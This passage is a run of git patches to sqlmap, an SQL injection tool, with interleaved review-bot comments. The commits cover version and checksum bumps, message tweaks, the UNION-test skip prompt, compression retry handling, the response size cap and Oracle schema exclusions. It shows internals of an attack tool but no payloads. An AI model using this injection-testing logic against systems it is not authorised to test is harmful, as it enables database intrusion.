  • ", r"CDbCommand (?P[^<>\n]*SQL[^<>\n]+)", diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 59f5f6859c1..c248aa2a57f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -00642325552444173985fa13b74f5b3f lib/core/settings.py +bae0e851c66391ef08200e29dc75e64f lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py From 01fb07f68c54cb25174b7c6c4e2c11bd168856d6 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 16 Mar 2018 14:28:37 +0100 Subject: [PATCH 075/428] Minor patch (message for --check-internet) --- lib/controller/controller.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 4e0fbfaa78b..9c3239d03fe 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -286,7 +286,7 @@ def start(): try: if conf.checkInternet: - infoMsg = "[INFO] checking for Internet connection" + infoMsg = "checking for Internet connection" logger.info(infoMsg) if not checkInternet(): diff --git a/lib/core/settings.py b/lib/core/settings.py index 19d0eea6ca4..94986c9e5c5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.28" +VERSION = "1.2.3.29" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c248aa2a57f..51325d9b03a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -22,7 +22,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py 62a348c0ed32c7e67cd456680791cad5 lib/controller/checks.py -2ba69df20a4ca72b4255761c3463b8a4 lib/controller/controller.py +33689bb1b064d4eebc216934795a595f lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -bae0e851c66391ef08200e29dc75e64f lib/core/settings.py +5e64961566640262b0cd92c15b623647 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py From a27f21cb1d0ec8d2c844c80391658d5ffdfb5305 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 16 Mar 2018 14:30:47 +0100 Subject: [PATCH 076/428] Trivial message updates --- lib/core/option.py | 4 ++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index b842c890fe9..ca4c45959c5 100644 --- a/lib/core/option.py +++ b/lib/core/option.py 
@@ -2542,11 +2542,11 @@ def _basicOptionValidation(): raise SqlmapSyntaxException(errMsg) if conf.checkTor and not any((conf.tor, conf.proxy)): - errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address using Tor)" + errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address of Tor service)" raise SqlmapSyntaxException(errMsg) if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort >= 0 and conf.torPort <= 65535): - errMsg = "value for option '--tor-port' must be in range 0-65535" + errMsg = "value for option '--tor-port' must be in range [0, 65535]" raise SqlmapSyntaxException(errMsg) if conf.torType not in getPublicTypeMembers(PROXY_TYPE, True): diff --git a/lib/core/settings.py b/lib/core/settings.py index 94986c9e5c5..7957ac9b32b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.29" +VERSION = "1.2.3.30" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 51325d9b03a..bd2302bb7c2 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py -911ec851f2cad046036ddaf776c8559f lib/core/option.py +aa2301ab9a331b228c1c83cdaa2bd79b lib/core/option.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -5e64961566640262b0cd92c15b623647 lib/core/settings.py +9c99add278af896b8cffcdf6b898ca9c lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py From ac68eed65d744b40c094d58106a49042700fff89 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 16 Mar 2018 14:33:22 +0100 Subject: [PATCH 077/428] Trivial code style update --- lib/core/option.py | 2 -- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 3 insertions(+), 5 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index ca4c45959c5..63582f5d995 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -2316,7 +2316,6 @@ def _setTorHttpProxySettings(): errMsg = "can't establish connection with the Tor HTTP proxy. " errMsg += "Please make sure that you have Tor (bundle) installed and setup " errMsg += "so you could be able to successfully use switch '--tor' " - raise SqlmapConnectionException(errMsg) if not conf.checkTor: 
@@ -2337,7 +2336,6 @@ def _setTorSocksProxySettings(): errMsg = "can't establish connection with the Tor SOCKS proxy. " errMsg += "Please make sure that you have Tor service installed and setup " errMsg += "so you could be able to successfully use switch '--tor' " - raise SqlmapConnectionException(errMsg) # SOCKS5 to prevent DNS leaks (http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29) diff --git a/lib/core/settings.py b/lib/core/settings.py index 7957ac9b32b..d887a877587 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.30" +VERSION = "1.2.3.31" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bd2302bb7c2..59f2e47c664 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py -aa2301ab9a331b228c1c83cdaa2bd79b lib/core/option.py +b7c3e98e5400d73e9ce5c1a30145f7c6 lib/core/option.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9c99add278af896b8cffcdf6b898ca9c lib/core/settings.py +424f33989eb6a1aeafe09c49cf03a5e7 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py 
From a6809e03efdb53990f04a07db9fb47a3cbf5ee61 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 16 Mar 2018 14:38:47 +0100 Subject: [PATCH 078/428] Minor just in case patch --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index a64e962ed2a..3ac16fa1772 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1417,7 +1417,7 @@ def parseTargetUrl(): raise SqlmapGenericException(errMsg) if not re.search(r"^http[s]*://", conf.url, re.I) and not re.search(r"^ws[s]*://", conf.url, re.I): - if ":443/" in conf.url: + if re.search(r":443\b", conf.url): conf.url = "https://%s" % conf.url else: conf.url = "http://%s" % conf.url diff --git a/lib/core/settings.py b/lib/core/settings.py index d887a877587..baf815e853e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.31" +VERSION = "1.2.3.32" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 59f2e47c664..42c62007f28 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -6266f487eeafeccab0c2d7f43d20e85c lib/core/common.py +10654e525e0740a8a0df9b1baab455d2 lib/core/common.py 1c4c4bf8eacc911378a2e4b2f9f03184 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 
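Review bot: `re.search(r":443\b", conf.url)` matches `:443` anywhere in the string, not only in the host part, so a URL such as `example.com/path?next=host:443` (constructed example) would now be rewritten to https, and `\b` also accepts `:443.` or `:443-`. Anchoring to the authority keeps the intended gain (no trailing slash required) while ignoring path and query: `if re.search(r"\A[^/?#]*:443\b", conf.url):`. parseTargetUrl continues outside the hunk.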
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -424f33989eb6a1aeafe09c49cf03a5e7 lib/core/settings.py +17745353e1c638259aca7f77cf2d34b8 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py From 6c2b7cff80e2ad9c3157326ef3c42e11376e1f20 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 16 Mar 2018 15:11:04 +0100 Subject: [PATCH 079/428] Minor patch of UNION checking logic --- lib/controller/checks.py | 30 +++++++++++++++++------------- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 20 insertions(+), 16 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 4733f178b90..e54f8461ac7 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -203,7 +203,7 @@ def checkSqlInjection(place, parameter, value): continue match = re.search(r"(\d+)-(\d+)", test.request.columns) - if injection.data and match: + if match and injection.data: lower, upper = int(match.group(1)), int(match.group(2)) for _ in (lower, upper): if _ > 1: 
@@ -329,6 +329,22 @@ def checkSqlInjection(place, parameter, value): logger.debug(debugMsg) continue + match = re.search(r"(\d+)-(\d+)", test.request.columns) + if match and not injection.data: + _ = test.request.columns.split('-')[-1] + if conf.uCols is None and _.isdigit() and int(_) > 10: + if kb.futileUnion is None: + msg = "it is not recommended to perform " + msg += "extended UNION tests if there is not " + msg += "at least one other (potential) " + msg += "technique found. Do you want to skip? [Y/n] " + kb.futileUnion = not readInput(msg, default='Y', boolean=True) + + if kb.futileUnion is False: + debugMsg = "skipping test '%s'" % title + logger.debug(debugMsg) + continue + infoMsg = "testing '%s'" % title logger.info(infoMsg) @@ -653,18 +669,6 @@ def genCmpPayload(): infoMsg += "there is at least one other (potential) " infoMsg += "technique found" singleTimeLogMessage(infoMsg) - elif not injection.data: - _ = test.request.columns.split('-')[-1] - if _.isdigit() and int(_) > 10: - if kb.futileUnion is None: - msg = "it is not recommended to perform " - msg += "extended UNION tests if there is not " - msg += "at least one other (potential) " - msg += "technique found. Do you want to skip? [Y/n] " - - kb.futileUnion = not readInput(msg, default='Y', boolean=True) - if kb.futileUnion is False: - continue # Test for UNION query SQL injection reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix) diff --git a/lib/core/settings.py b/lib/core/settings.py index baf815e853e..c324909657d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
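Review bot: `match` from `re.search(r"(\d+)-(\d+)", test.request.columns)` is used only as a boolean while the upper column bound is re-parsed with `test.request.columns.split('-')[-1]` and `_.isdigit()`; for the "N-M" form `match.group(2)` already holds that digit string, so the condition can read `if conf.uCols is None and int(match.group(2)) > 10:` and the `_ = ...` line goes. The same code is carried over unchanged into the next commit's hunk, where it is wrapped in `if stype == PAYLOAD.TECHNIQUE.UNION:`, so the simplification applies there too. checkSqlInjection continues outside the hunk.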
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.32" +VERSION = "1.2.3.33" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 42c62007f28..bd6de5e7aea 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -62a348c0ed32c7e67cd456680791cad5 lib/controller/checks.py +a6751962ab23d450857c11f7466dd43c lib/controller/checks.py 33689bb1b064d4eebc216934795a595f lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -17745353e1c638259aca7f77cf2d34b8 lib/core/settings.py +a719b1091a4864e59d43f003f8f0155b lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py From 74de40b9c51685102efc4018df722dfb063889e2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 16 Mar 2018 15:21:19 +0100 Subject: [PATCH 080/428] Minor patch of a previous commit --- lib/controller/checks.py | 31 ++++++++++++++++--------------- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 19 insertions(+), 18 deletions(-) 
diff --git a/lib/controller/checks.py b/lib/controller/checks.py index e54f8461ac7..b8e54cfe946 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -329,21 +329,22 @@ def checkSqlInjection(place, parameter, value): logger.debug(debugMsg) continue - match = re.search(r"(\d+)-(\d+)", test.request.columns) - if match and not injection.data: - _ = test.request.columns.split('-')[-1] - if conf.uCols is None and _.isdigit() and int(_) > 10: - if kb.futileUnion is None: - msg = "it is not recommended to perform " - msg += "extended UNION tests if there is not " - msg += "at least one other (potential) " - msg += "technique found. Do you want to skip? [Y/n] " - kb.futileUnion = not readInput(msg, default='Y', boolean=True) - - if kb.futileUnion is False: - debugMsg = "skipping test '%s'" % title - logger.debug(debugMsg) - continue + if stype == PAYLOAD.TECHNIQUE.UNION: + match = re.search(r"(\d+)-(\d+)", test.request.columns) + if match and not injection.data: + _ = test.request.columns.split('-')[-1] + if conf.uCols is None and _.isdigit() and int(_) > 10: + if kb.futileUnion is None: + msg = "it is not recommended to perform " + msg += "extended UNION tests if there is not " + msg += "at least one other (potential) " + msg += "technique found. Do you want to skip? [Y/n] " + kb.futileUnion = not readInput(msg, default='Y', boolean=True) + + if kb.futileUnion is False: + debugMsg = "skipping test '%s'" % title + logger.debug(debugMsg) + continue infoMsg = "testing '%s'" % title logger.info(infoMsg) diff --git a/lib/core/settings.py b/lib/core/settings.py index c324909657d..86896113997 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.33" +VERSION = "1.2.3.34" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bd6de5e7aea..cb5ffa03c36 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -a6751962ab23d450857c11f7466dd43c lib/controller/checks.py +e15cd43d7bd71d04990494d13897c490 lib/controller/checks.py 33689bb1b064d4eebc216934795a595f lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -a719b1091a4864e59d43f003f8f0155b lib/core/settings.py +7c1b5473621cf472755e6a0a13e3cd0e lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py From e088fe08ecb90dbfd67df9a1484c983a1aac95f5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 19 Mar 2018 00:33:30 +0100 Subject: [PATCH 081/428] Update related to the #2995 --- lib/core/settings.py | 2 +- lib/request/connect.py | 6 +++++- txt/checksum.md5 | 4 ++-- 3 files changed, 8 insertions(+), 4 deletions(-) 
diff --git a/lib/core/settings.py b/lib/core/settings.py index 86896113997..4862798b86d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.34" +VERSION = "1.2.3.35" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 54c2ae3239c..4f2defc2856 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -187,12 +187,13 @@ def _connReadProxy(conn): if not kb.dnsMode and conn: headers = conn.info() - if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate") or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()): + if kb.pageCompress and headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate") or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()): retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE) if len(retVal) == MAX_CONNECTION_TOTAL_SIZE: warnMsg = "large compressed response detected. Disabling compression" singleTimeWarnMessage(warnMsg) kb.pageCompress = False + raise SqlmapCompressionException else: while True: if not conn: @@ -682,6 +683,9 @@ class _(dict): status = re.search(r"Handshake status ([\d]{3})", tbMsg) errMsg = "websocket handshake status %s" % status.group(1) if status else "unknown" raise SqlmapConnectionException(errMsg) + elif "SqlmapCompressionException" in tbMsg: + warnMsg = "problems with response (de)compression" + retrying = True else: warnMsg = "unable to connect to the target URL" 
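Review bot: The new `raise SqlmapCompressionException` carries no message and the handler recognises it only by searching the class name in the traceback text (`"SqlmapCompressionException" in tbMsg`), which is consistent with the neighbouring branches but fragile; if the name is not already imported in connect.py the line raises NameError instead and falls through to the generic "unable to connect" branch, so that import is worth confirming since this commit adds none. The retry re-issues a request whose response already hit MAX_CONNECTION_TOTAL_SIZE, now with compression disabled, and nothing in the code says that is deliberate; a comment before the raise such as `# body hit the size cap while compressed: compression is now off, retry the request uncompressed` would make the control flow readable. _connReadProxy and the handler both extend beyond the hunk.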
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index cb5ffa03c36..d4a2fb008fe 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7c1b5473621cf472755e6a0a13e3cd0e lib/core/settings.py +c6d64920b174a1fc445d6833b96a192a lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py @@ -68,7 +68,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 53c38db67dd4b14fbceee71e4748f874 lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -156376d6a08eb4bc0df31ee79f08820e lib/request/connect.py +b51c3f8b5cc65c6d7c81471577afd87d lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py From ee431cd83b5f33d75cfd40bd73395dd722c22f96 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 19 Mar 2018 00:39:48 +0100 Subject: [PATCH 082/428] Minor update --- lib/core/settings.py | 2 +- txt/checksum.md5 | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 4862798b86d..cbb779cd7bb 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -640,7 +640,7 @@ MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024 # Maximum response total page size (trimmed if larger) -MAX_CONNECTION_TOTAL_SIZE = 50 * 1024 * 1024 +MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024 # For preventing MemoryError exceptions (caused when using large sequences in difflib.SequenceMatcher) MAX_DIFFLIB_SEQUENCE_LENGTH = 10 * 1024 * 1024 
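Review bot: Doubling MAX_CONNECTION_TOTAL_SIZE means `conn.read(MAX_CONNECTION_TOTAL_SIZE)` in connect.py can now hold up to 100 MiB of target-controlled response body in memory per request, multiplied by worker threads, and the commit gives no rationale. The constant's existing comment should record the trade-off, e.g. `# Maximum response total page size (trimmed if larger); bounds per-response memory, so raising it raises the per-thread cost`.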
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d4a2fb008fe..12ac16be154 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -c6d64920b174a1fc445d6833b96a192a lib/core/settings.py +11233011a6d1ace9d5e230c89511c235 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py From c378b6691cd50e9085969c9b147057e45707465d Mon Sep 17 00:00:00 2001 From: Arjun V Date: Mon, 19 Mar 2018 05:21:00 +0530 Subject: [PATCH 083/428] Adding sample schemas shipped with Oracle DB (#2992) * Adding sample schemas shipped with Oracle DB Added sample schemas that are included with the Oracle Guides. They are unbelievably common in live systems from personal experience. https://docs.oracle.com/cd/E11882_01/server.112/e10575/tdpsg_user_accounts.htm#TDPSG20303 * Adding as an oracle system database for exclusion `APPQOSSYS` schema is used by Oracle Database QoS Management https://docs.oracle.com/cd/E11882_01/server.112/e24611/install_config.htm --- lib/core/settings.py | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index cbb779cd7bb..bfd2b431540 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -221,11 +221,14 @@ PLATFORM = os.name PYVERSION = sys.version.split()[0] +# DBMS sample databases +ORACLE_SAMPLE_DBS = ("BI", "HR", "OE", "OC", "PM", "IX", "SH", "SCOTT") # https://docs.oracle.com/cd/E11882_01/server.112/e10575/tdpsg_user_accounts.htm#BABHFGJF + # DBMS system databases MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb") MYSQL_SYSTEM_DBS = ("information_schema", "mysql", "performance_schema") PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast", "pgagent") -ORACLE_SYSTEM_DBS = ("ANONYMOUS", "APEX_PUBLIC_USER", "CTXSYS", "DBSNMP", "DIP", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "WKPROXY", "WKSYS", "WK_TEST", "WMSYS", "XDB", "XS$NULL") # Reference: https://blog.vishalgupta.com/2011/06/19/predefined-oracle-system-schemas/ +ORACLE_SYSTEM_DBS = ORACLE_SAMPLE_DBS + ("ANONYMOUS", "APEX_PUBLIC_USER", "APEX_030200", "APPQOSSYS", "CTXSYS", "DBSNMP", "DIP", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "WKPROXY", "WKSYS", "WK_TEST", "WMSYS", "XDB", "XS$NULL") # Reference: 